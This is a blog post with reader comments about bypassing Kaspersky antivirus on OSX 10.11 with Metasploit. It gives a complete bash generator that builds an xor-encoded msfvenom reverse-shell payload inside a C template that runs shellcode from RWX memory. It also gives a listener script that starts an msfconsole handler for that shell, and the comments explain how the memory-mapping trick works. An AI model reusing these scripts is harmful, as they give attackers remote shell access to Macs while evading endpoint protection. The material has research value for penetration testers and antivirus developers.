Bypassing antivirus on OSX 10.11 with Metasploit – Kaspersky

Next in line for the tests is Kaspersky. (There has been lately a political turmoil about them which is kind of childish. US accusing Russia of spying ..haha .. these two countries spy on each other for decades … yawn)

There is no free version, so we are stuck with a trial which you can download from https://usa.kaspersky.com/mac-security

TL;DR we can get the same code executed fine like with Avast with our custom payload  https://astr0baby.wordpress.com/2017/07/13/bypassing-antivirus-on-osx-10-11-with-metasploit-avast/ I was curious about the Network Attack blocker function on OSX, as I remember that this thing was quite good on Windows in blocking certain meterpreter operations.

Kaspersky detects all EICAR and standard msfvenom generated stuff as well as the JAR payloads.

So again we try the custom source code template and the shellcode as shown here

Here is a generator for the above to make life easier .. OSX-x64-payload-generator.sh

#!/bin/bash
clear 
echo "************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " For OSX 64bit Antivirus bypass (Avast) " 
echo "************************************************************"
echo -e "What IP are we gonna use ? \c"
read IP 
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo '[*] Checking if metasploit msfvenom is present..'
if [ -x ./msfvenom ]; then
echo '[*] Found msfvenom in current path ........ good'
else
 echo '[-] No msfvenom in path...make sure you have this script in your metasploit-framework path'
exit 0
fi 
echo '[*] Cleaning up ' 
rm -f osx64-payload.c
./msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=$IP LPORT=$port -a x64 --platform OSX -e x64/xor -f c -o test.c
echo "#include <stdio.h>" > temp.c 
echo '#include <sys/types.h>' >> temp.c
echo '#include <sys/ipc.h>' >> temp.c
echo '#include <sys/msg.h>' >> temp.c
echo '#include <string.h>' >> temp.c
echo '#include <sys/mman.h>' >> temp.c
echo '#include <fcntl.h>' >> temp.c
echo '#include <sys/socket.h>' >> temp.c
echo '#include <stdlib.h>' >> temp.c
echo '#include <errno.h>' >> temp.c
echo '#include <sys/mman.h>' >> temp.c
echo '#include <sys/types.h>' >> temp.c
echo '#include <sys/stat.h>' >> temp.c
echo '#include <sys/ioctl.h>' >> temp.c
echo '#include <unistd.h>' >> temp.c
echo '#include <strings.h>' >> temp.c
echo '#include <unistd.h>' >> temp.c
echo '#include <poll.h>' >> temp.c
echo '#include <pthread.h>' >> temp.c 
echo '#include <stdint.h>' >> temp.c 
echo '' >> temp.c 
cat test.c >> temp.c 
echo '' >> temp.c
echo 'int main(int argc, char **argv)' >> temp.c
echo '{' >> temp.c
echo 'void *ptr = mmap(0, 0x1000, PROT_WRITE|PROT_READ|PROT_EXEC, MAP_ANON | MAP_PRIVATE, -1, 0);' >> temp.c
echo 'printf("ret: 0x%x",ptr);' >> temp.c
echo 'memcpy(ptr,buf,sizeof buf);' >> temp.c
echo 'void (*fp)() = (void (*)())ptr;' >> temp.c
echo 'fp();' >> temp.c
echo '' >> temp.c
echo '}' >> temp.c
mv temp.c osx64-payload.c
if [ -f ./osx64-payload.c ]; then
echo '[*] osx64-payoad.c generated ...'
ls -la osx64-payload.c
else
 echo '[-] Something went wrong .. '
exit 0
fi

And the listener LISTENER-MAC-LATEST.sh

#!/bin/bash
clear
echo "***************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " For Automatic Teensy programming and deployment "
echo "***************************************************************"
echo -e "What IP are we gonna listen to ? \c"
read host
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo "Starting the meterpreter listener.."
echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD osx/x64/shell_reverse_tcp ; set LHOST ' > run.listener.sh 
echo -n $host >> run.listener.sh 
echo -n '; set LPORT ' >> run.listener.sh 
echo -n $port >> run.listener.sh 
echo -n '; run"' >> run.listener.sh 
chmod +x run.listener.sh 
./run.listener.sh

Here we have some screenshots of c0mpilation and execution of the custom meteasploit payload on OSX with Kaspersky

Thats all for now :)

 

Advertisements
Gallery | This entry was posted in Uncategorized. Bookmark the permalink.

6 Responses to Bypassing antivirus on OSX 10.11 with Metasploit – Kaspersky

  1. Hey!
    I just wonder, are the following piece of code crucial for bypassing av?
    void *ptr = mmap(0, 0x1000, PROT_WRITE|PROT_READ|PROT_EXEC, MAP_ANON | MAP_PRIVATE, -1, 0);
    If yes, can you please tell me how does this work? Thanks

    • astr0baby says:

      Its self explanatory – we are setting up memory segment with RWX flags, once the session gets initiated the payload gets pushed to memory from the metasploit server

      • So I seem to get this.
        This piece of code is equivalent to the following line:
        void *ptr = mmap(0, sizeof(shellcode),PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
        memcpy(ptr, shellcode, sizeof(shellcode));
        Where the file descriptor is ignored with the -1 handle, and a specific memory address is assigned for the shellcode.
        And the advantage of this method toward the traditional one below:
        int (*execute)() = (int (*)())shellcode;
        execute();
        Is that the shellcode is injected into a private, anonymous memory section and is thus harder to discover..?

      • astr0baby says:

        MAP_ANONYMOUS + MAP_PRIVATE:

        every call creates a distinct mapping
        children inherit parent’s mappings
        childrens’ writes on the inherited mapping are catered in copy-on-write manner
        the main purpose of using this kind of mapping is to allocate a new zeroized memory
        malloc employs anonymous private mappings to serve memory allocation requests larger than MMAP_THRESHOLD bytes.
        typically, MMAP_THRESHOLD is 128kB.

  2. Just another question. Are the file inclusions at the beginning related to bypassing av as well?

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s